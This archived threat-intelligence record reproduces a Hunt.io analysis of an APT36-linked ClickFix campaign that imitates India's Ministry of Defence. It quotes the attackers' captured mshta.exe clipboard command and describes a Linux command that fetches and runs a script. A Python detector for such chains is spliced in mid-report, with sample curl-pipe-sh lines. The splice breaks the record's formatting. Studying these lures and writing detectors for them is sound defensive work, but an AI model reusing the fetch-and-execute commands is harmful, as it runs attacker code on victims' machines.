{
	"id": "252c3ae6-46ca-46fa-a30c-5fbc3ca22f70",
	"created_at": "2026-04-06T00:06:11.784835Z",
	"updated_at": "2026-04-10T03:36:50.338295Z",
	"deleted_at": null,
	"sha1_hash": "30563a73c58fbb3046b695ddfe2197be912f81cf",
	"title": "APT36-Linked ClickFix Campaign Spoofs Indian Ministry of Defence, Targets Windows \u0026 Linux Users",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 36387365,
	"plain_text": "APT36-Linked ClickFix Campaign Spoofs Indian Ministry of Defence, Targets Windows \u0026 Linux Users\r\nPublished: 2025-05-05 · Archived: 2026-04-05 13:20:28 UTC\r\nThreat actors continue to adopt recognizable branding and official imagery to lower suspicion and facilitate malware execution. Infrastructure spoofing India's Ministry of Defence was recently observed delivering cross-platform malware through a ClickFix-style infection chain. The site mimicked government press releases, staged payloads through a possibly compromised .in domain, and used visual deception to appear credible during execution.\r\nThis activity mirrors patterns seen in other ClickFix cases: reuse of public-sector branding, staging of malware in web asset directories, and targeting of both Windows and Linux to maximize reach.\r\nInitial Landing Page: Fake Ministry Press Release Portal\r\nWhile surveying domains imitating official government websites, Hunt.io identified email.gov.in.drdosurvey[.]info serving content spoofing India's Ministry of Defence. Visiting the site in a browser opened a page mimicking the Ministry's official press release archive, with structure and layout closely modeled on the legitimate portal.\r\nA comparison of the URL paths is below:\r\nLegitimate: /index.php/en/press-releases-ministry-defence-0\r\nMalicious: /content/press-releases-ministry-defence-0.html\r\nThe threat actor(s) attempted to recreate the Ministry's public document archive, which normally lists monthly press releases from September 2023 through April 2025. 
However, on the cloned page only a single link, the one for March 2025, was active; every other month displayed a static \"No Data\" status.\r\nhttps://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence\r\nPage 1 of 9\r\nFigure 1: Page screenshot showing only the March 2025 link.\r\nReviewing the cloned portal's source code revealed that the page had been created using HTTrack, a publicly available website copying tool. Metadata embedded within the HTML suggested the cloning occurred in early March 2025.\r\nFigure 2: Source code snippet showing HTTrack metadata\r\nClickFix Technique Observations\r\nClicking the only active link on the cloned press release portal, labeled March 2025, initiates a ClickFix-style social engineering flow. The user is directed to one of two PHP pages depending on their operating system:\r\nWindows: /captcha/windows.php\r\nLinux: /captcha/linux.php\r\nThe Linux-specific flow, which appears less mature and may still be under development, is covered first; the Windows flow follows.\r\nLinux Flow: CAPTCHA Lure and Shell Command Execution\r\nThe Linux CAPTCHA page presents a minimal interface with a single blue button labeled \"I'm not a rebot\". The misspelling may be a simple typo or may have been introduced deliberately to evade automated scanning for similar pages.\r\nFigure 3: CAPTCHA page showing the \"I'm not a rebot\" button\r\nUpon clicking the button, a shell command is silently copied to the user's clipboard. 
If pasted and executed in a terminal, the command downloads a shell script named mapeal.sh from https://trade4wealth[.]in/admin/assets/js/, grants it execute permission via chmod +x, and then runs it immediately. The payload delivery domain, trade4wealth[.]in, is assessed as a likely compromised or abandoned asset repurposed as part of the delivery infrastructure.\r\nImmediately after the payload command is copied, the user is redirected to linux-guide.php, which displays a verification overlay and a set of instructions:\r\n1. Press ALT + F2\r\n2. Press CTRL + V\r\n3. Press Enter\r\nOn most Linux desktops ALT + F2 opens the run-command dialog rather than a terminal, so the victim pastes and runs the clipboard contents without ever seeing a shell prompt or the command's output.\r\nFigure 4: linux-guide.php showing the fake CAPTCHA and \"Verificaton Steps\" (misspelled as shown on the lure page)\r\nThe page presents the next phase of the ClickFix flow: a spoofed CAPTCHA overlay paired with step-by-step instructions designed to trick users into executing clipboard-delivered shell commands.\r\nBehind the overlay, the background appears to be a static image containing a faint watermark from PCRisk, a legitimate cybersecurity information site that publishes malware removal guides and threat analysis. The inclusion of this image may be intended to mimic the appearance of a trusted security interface and reduce suspicion during execution.\r\nAs of this writing, the Linux payload (mapeal.sh) performs no observable malicious behavior. The script downloads a JPEG image from the same trade4wealth[.]in directory and opens it in the background. 
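Because the whole Linux chain (fetch a script from a web-asset path, chmod +x, run it) arrives as one pasted command line, it is easy to match in process-creation or shell-history telemetry. The following is an added example written for this page, not code from the Hunt.io post or from the campaign: it parses a command line with the standard shlex module, splits it at shell control operators, unwraps a bash -c wrapper (the form a pasted chain needs if the run dialog does not itself invoke a shell), and flags any line that both fetches a URL and executes the fetched file, or pipes the fetch straight into a shell. The host example.invalid, the SAMPLES list and every command line in it are constructed for the demonstration; the first two mirror the mapeal.sh chain described above but are not the captured command.

```python
# Added example (not from the Hunt.io post): flag ClickFix-style Linux command
# lines that fetch a remote script and execute it within the same command line.
import shlex
from dataclasses import dataclass, field

FETCHERS = {'curl', 'wget'}
SHELLS = {'sh', 'bash', 'dash', 'zsh'}
SEPARATORS = {'&&', '||', ';', '|'}


@dataclass
class Verdict:
    downloads: list = field(default_factory=list)      # URLs fetched
    chmod_targets: list = field(default_factory=list)  # basenames handed to chmod
    executed: list = field(default_factory=list)       # fetched files that were run
    piped_to_shell: bool = False                       # fetch output piped into sh/bash

    @property
    def suspicious(self) -> bool:
        # The ClickFix shape: one command line that downloads something and then
        # runs the download, or streams it straight into a shell.
        return bool(self.downloads) and (self.piped_to_shell or bool(self.executed))


def _basename(path: str) -> str:
    return path.rsplit('/', 1)[-1]


def _unwrap_shell_c(tokens):
    # A desktop run dialog may not hand the line to a shell, so a chained
    # command is sometimes wrapped as: bash -c '<inner>'. Recurse into <inner>.
    if tokens and _basename(tokens[0]) in SHELLS and len(tokens) >= 3 and tokens[1] == '-c':
        return _unwrap_shell_c(shlex.split(tokens[2]))
    return tokens


def _segments(tokens):
    # Split the token list into simple commands at shell control operators,
    # remembering which operator introduced each segment.
    segs, cur, prev_sep = [], [], None

    def close(sep):
        nonlocal cur, prev_sep
        if cur:
            segs.append((prev_sep, cur))
        cur, prev_sep = [], sep

    for tok in tokens:
        if tok in SEPARATORS:
            close(tok)
        elif len(tok) > 1 and tok.endswith(';'):   # e.g. 'chmod +x f;'
            cur.append(tok[:-1])
            close(';')
        else:
            cur.append(tok)
    close(None)
    return segs


def classify(cmdline: str) -> Verdict:
    v = Verdict()
    try:
        tokens = _unwrap_shell_c(shlex.split(cmdline))
    except ValueError:
        return v   # unbalanced quotes: not a parseable shell line, nothing to flag
    fetched = set()   # basenames the fetcher wrote to disk
    for sep, seg in _segments(tokens):
        prog = _basename(seg[0])
        if prog in FETCHERS:
            for i, tok in enumerate(seg[1:], start=1):
                if tok.startswith('http://') or tok.startswith('https://'):
                    v.downloads.append(tok)
                    fetched.add(_basename(tok))
                # curl -o NAME and wget -O NAME choose the local file name
                if (prog == 'curl' and tok == '-o') or (prog == 'wget' and tok == '-O'):
                    if i + 1 < len(seg):
                        fetched.add(_basename(seg[i + 1]))
        elif prog == 'chmod':
            operands = [t for t in seg[1:] if not t.startswith('-')]   # mode, then files
            v.chmod_targets.extend(_basename(t) for t in operands[1:])
        elif prog in SHELLS:
            if sep == '|':
                v.piped_to_shell = True                # curl URL | sh
            elif len(seg) > 1 and _basename(seg[1]) in fetched:
                v.executed.append(_basename(seg[1]))   # bash mapeal.sh
        elif prog in fetched or prog in v.chmod_targets:
            v.executed.append(prog)                    # ./mapeal.sh or /tmp/mapeal.sh
    return v


# Constructed sample command lines (not captured from the campaign). The first
# two mirror the chain described above (fetch mapeal.sh from a web-asset path,
# chmod +x, run); example.invalid stands in for the real delivery host.
SQ = chr(39)   # a single quote character, used to build the bash -c wrapper
SAMPLES = [
    'curl -s https://example.invalid/admin/assets/js/mapeal.sh -o mapeal.sh && chmod +x mapeal.sh && ./mapeal.sh',
    'bash -c ' + SQ + 'wget -q https://example.invalid/admin/assets/js/mapeal.sh -O /tmp/mapeal.sh; chmod +x /tmp/mapeal.sh; /tmp/mapeal.sh' + SQ,
    'curl -fsSL https://example.invalid/install.sh | sh',
    'curl -L https://example.invalid/release.tar.gz -o release.tar.gz && tar xzf release.tar.gz',
    'chmod +x build.sh && ./build.sh',
]


def scan(cmdlines):
    # Return the lines whose shape is fetch-then-execute (here: the first three).
    return [c for c in cmdlines if classify(c).suspicious]


if __name__ == '__main__':
    for hit in scan(SAMPLES):
        print('CLICKFIX-SHAPE:', hit)
```

Run it directly to print the flagged samples, or call classify() on command lines pulled from auditd EXECVE records or .bash_history. The check keys on the shape of the chain rather than on the trade4wealth[.]in URL or the mapeal.sh name, so it still fires when the operators rotate infrastructure; the cost is that legitimate curl-pipe-sh installers match too, which is a triage decision rather than a parser defect.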
No additional activity, such as persistence mechanisms, lateral movement, or outbound communication, was observed during execution.\r\nWindows Flow: FOUO Warning and mshta-Based Payload Delivery\r\nOn Windows systems, clicking the March 2025 link redirects the user to /captcha/windows.php, which displays a full-screen overlay mimicking a government-style disclosure warning labeled \"For Official Use Only (FOUO).\" The background image appears to be a blurred capture of the official yoga.ayush.gov[.]in portal, a legitimate website operated by India's Ministry of AYUSH to promote yoga and wellness programs.\r\nFigure 5: windows.php page with FOUO warning and blurred AYUSH site in the background.\r\nAfter clicking the Continue button, the user is served a second-stage ClickFix sequence. A JavaScript function silently copies a malicious command to the clipboard and instructs the user to paste and execute it in a terminal. The command launches mshta.exe against a remote script hosted on the attacker-controlled infrastructure; the captured snippet, cut off after the assignment, reads:\r\nconst calcPath = \"C:\\\\Windows\\\\System32\\\\mshta.exe https://trade4wealth[.]in/admin/assets/css/default/index.php\"; navigato\r\nFigure 6: JavaScript source showing mshta.exe payload and clipboard copy logic.\r\nWhen accessed directly, index.php redirects to a second-stage payload at:\r\nhttps://trade4wealth[.]in/admin/assets/css/default/sysinte.hta\r\nThis HTA file contains hundreds of lines of obfuscated JavaScript using hexadecimal escape sequences, designed to hinder static analysis.\r\nFigure 7: Snippet of sysinte.hta.\r\nDynamic analysis of the decoded payload revealed a .NET-based loader, which initiates 
outbound connections to the IP address 185.117.90[.]212. A second spoofed subdomain, email.gov.in.avtzyu[.]store, also resolves to this host.\r\nWhile the malware executes in the background, the user is shown a decoy document: an apparently legitimate press release themed around the Indian Ministry of Defence. The PDF appears to have been cloned directly from the actual press release portal, likely to reinforce the illusion of legitimacy.\r\nFigure 8: Decoy PDF shown to the victim during malware execution.\r\nOperator Traits and Attribution\r\nSeveral observable traits across this campaign can help defenders identify related malicious infrastructure and anticipate future staging activity:\r\n- Domains mimicking Indian government subdomains, particularly variations of email.gov[.]in, combined with attacker-controlled parent domains (e.g., drdosurvey[.]info, avtzyu[.]store). The registrable domain is the attacker's; only the leading labels are spoofed, which is what a hostname check should key on.\r\n- Use of Namecheap as registrar and registrar-servers[.]com nameservers, both commonly abused in malicious activity.\r\n- HTA payloads staged deep in URL paths that masquerade as benign web-asset directories (admin/assets/css/default/).\r\n- Spelling anomalies, such as \"I'm not a rebot\" and \"officia use only\", which may be deliberate attempts to evade pattern-based detection or may simply be operator errors.\r\n- Cross-platform delivery using clipboard-based execution on both Windows (mshta.exe) and Linux (curl + chmod + bash), which gives the operators flexibility in staging.\r\nAttribution Assessment\r\nWhile attribution remains unconfirmed, the tradecraft observed in this campaign (government-themed lure content, HTA-based delivery, decoy documents, and targeting of Indian government infrastructure) is consistent with historic activity attributed to APT36 (also known as Transparent Tribe).\r\nAPT36 is a Pakistan-aligned threat actor known for:\r\n- Longstanding focus on Indian government, military, and diplomatic 
targets.\r\n- Repeated use of .NET-based malware, HTA delivery, and cloned login or press release content.\r\n- Infrastructure that frequently includes typosquatting, misuse of legitimate services, and publicly visible scripting errors.\r\nBased on these overlaps, this activity is assessed with medium confidence to align with APT36's broader targeting and operational patterns.\r\nFinal thoughts\r\nThis campaign reflects a familiar playbook with subtle adjustments: cloned government branding, decoy files, and low-friction execution paths tailored to each operating system. While not technically advanced, the operators showed clear intent in crafting believable lures and maintaining control over payload delivery across platforms.\r\nThe combination of press release theming, clipboard-based execution, and reused security imagery fits a pattern seen in prior APT36 activity. While not definitive, it is a strong indication that known actors are continuing to test ClickFix-style techniques in new contexts.\r\nFor defenders, the takeaway is not tied to a single technique; it is the way familiar methods are being reused in slightly new combinations. Look for clipboard-delivered commands, spoofed government subdomains, shallow clones of trusted sites, and payloads staged under common web-asset folders. These small patterns, seen together, often reveal a larger campaign taking shape. We've observed similar patterns in our previous research on ClickFix infrastructure, where early-stage domains showed many of the same traits.\r\nAPT36-Like Infrastructure Network Observables and Indicators of Compromise (IOCs)\r\nIP Address       | Domain(s)                            | Hosting Company                           | Location\r\n192.64.118[.]76  | email[.]gov[.]in[.]drdosurvey[.]info | Namecheap, Inc. (contains parked domains) | US\r\n185.117.90[.]212 | email[.]gov[.]in[.]avtzyu[.]store    | HZ Hosting Ltd                            | NL\r\nAPT36-Like Infrastructure Host Observables and Indicators of Compromise (IOCs)\r\nFilename    | SHA-256                                                          | Misc.\r\nsysinte.hta | 7087e5f768acaad83550e6b1b9696477089d2797e8f6e3f9a9d69c77177d030e | HTA file associated with the Windows ClickFix technique.\r\nSource: https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence"
	],
	"report_names": [
		"apt36-clickfix-campaign-indian-ministry-of-defence"
	],
	"threat_actors": [
		{
			"id": "414d7c65-5872-4e56-8a7d-49a2aeef1632",
			"created_at": "2025-08-07T02:03:24.7983Z",
			"updated_at": "2026-04-10T02:00:03.76109Z",
			"deleted_at": null,
			"main_name": "COPPER FIELDSTONE",
			"aliases": [
				"APT36 ",
				"Earth Karkaddan ",
				"Gorgon Group ",
				"Green Havildar ",
				"Mythic Leopard ",
				"Operation C-Major ",
				"Operation Transparent Tribe ",
				"Pasty Draco ",
				"ProjectM ",
				"Storm-0156 "
			],
			"source_name": "Secureworks:COPPER FIELDSTONE",
			"tools": [
				"CapraRAT",
				"Crimson RAT",
				"DarkComet",
				"ElizaRAT",
				"LuminosityLink",
				"ObliqueRAT",
				"Peppy",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "fce5181c-7aab-400f-bd03-9db9e791da04",
			"created_at": "2022-10-25T15:50:23.759799Z",
			"updated_at": "2026-04-10T02:00:05.3002Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"Transparent Tribe",
				"COPPER FIELDSTONE",
				"APT36",
				"Mythic Leopard",
				"ProjectM"
			],
			"source_name": "MITRE:Transparent Tribe",
			"tools": [
				"DarkComet",
				"ObliqueRAT",
				"njRAT",
				"Peppy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "abb24b7b-6baa-4070-9a2b-aa59091097d1",
			"created_at": "2022-10-25T16:07:24.339942Z",
			"updated_at": "2026-04-10T02:00:04.944806Z",
			"deleted_at": null,
			"main_name": "Transparent Tribe",
			"aliases": [
				"APT 36",
				"APT-C-56",
				"Copper Fieldstone",
				"Earth Karkaddan",
				"G0134",
				"Green Havildar",
				"Mythic Leopard",
				"Opaque Draco",
				"Operation C-Major",
				"Operation Honey Trap",
				"Operation Transparent Tribe",
				"ProjectM",
				"STEPPY-KAVACH",
				"Storm-0156",
				"TEMP.Lapis",
				"Transparent Tribe"
			],
			"source_name": "ETDA:Transparent Tribe",
			"tools": [
				"Amphibeon",
				"Android RAT",
				"Bezigate",
				"Bladabindi",
				"Bozok",
				"Bozok RAT",
				"BreachRAT",
				"Breut",
				"CapraRAT",
				"CinaRAT",
				"Crimson RAT",
				"DarkComet",
				"DarkKomet",
				"ElizaRAT",
				"FYNLOS",
				"Fynloski",
				"Jorik",
				"Krademok",
				"Limepad",
				"Luminosity RAT",
				"LuminosityLink",
				"MSIL",
				"MSIL/Crimson",
				"Mobzsar",
				"MumbaiDown",
				"Oblique RAT",
				"ObliqueRAT",
				"Peppy RAT",
				"Peppy Trojan",
				"Quasar RAT",
				"QuasarRAT",
				"SEEDOOR",
				"Scarimson",
				"SilentCMD",
				"Stealth Mango",
				"UPDATESEE",
				"USBWorm",
				"Waizsar RAT",
				"Yggdrasil",
				"beendoor",
				"klovbot",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c68fa27f-e8d9-4932-856b-467ccfe39997",
			"created_at": "2023-01-06T13:46:38.450585Z",
			"updated_at": "2026-04-10T02:00:02.980334Z",
			"deleted_at": null,
			"main_name": "Operation C-Major",
			"aliases": [
				"APT36",
				"APT 36",
				"TMP.Lapis",
				"COPPER FIELDSTONE",
				"Storm-0156",
				"Transparent Tribe",
				"ProjectM",
				"Green Havildar",
				"Earth Karkaddan",
				"C-Major",
				"Mythic Leopard"
			],
			"source_name": "MISPGALAXY:Operation C-Major",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775433971,
	"ts_updated_at": 1775792210,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/30563a73c58fbb3046b695ddfe2197be912f81cf.pdf",
		"text": "https://archive.orkl.eu/30563a73c58fbb3046b695ddfe2197be912f81cf.txt",
		"img": "https://archive.orkl.eu/30563a73c58fbb3046b695ddfe2197be912f81cf.jpg"
	}
}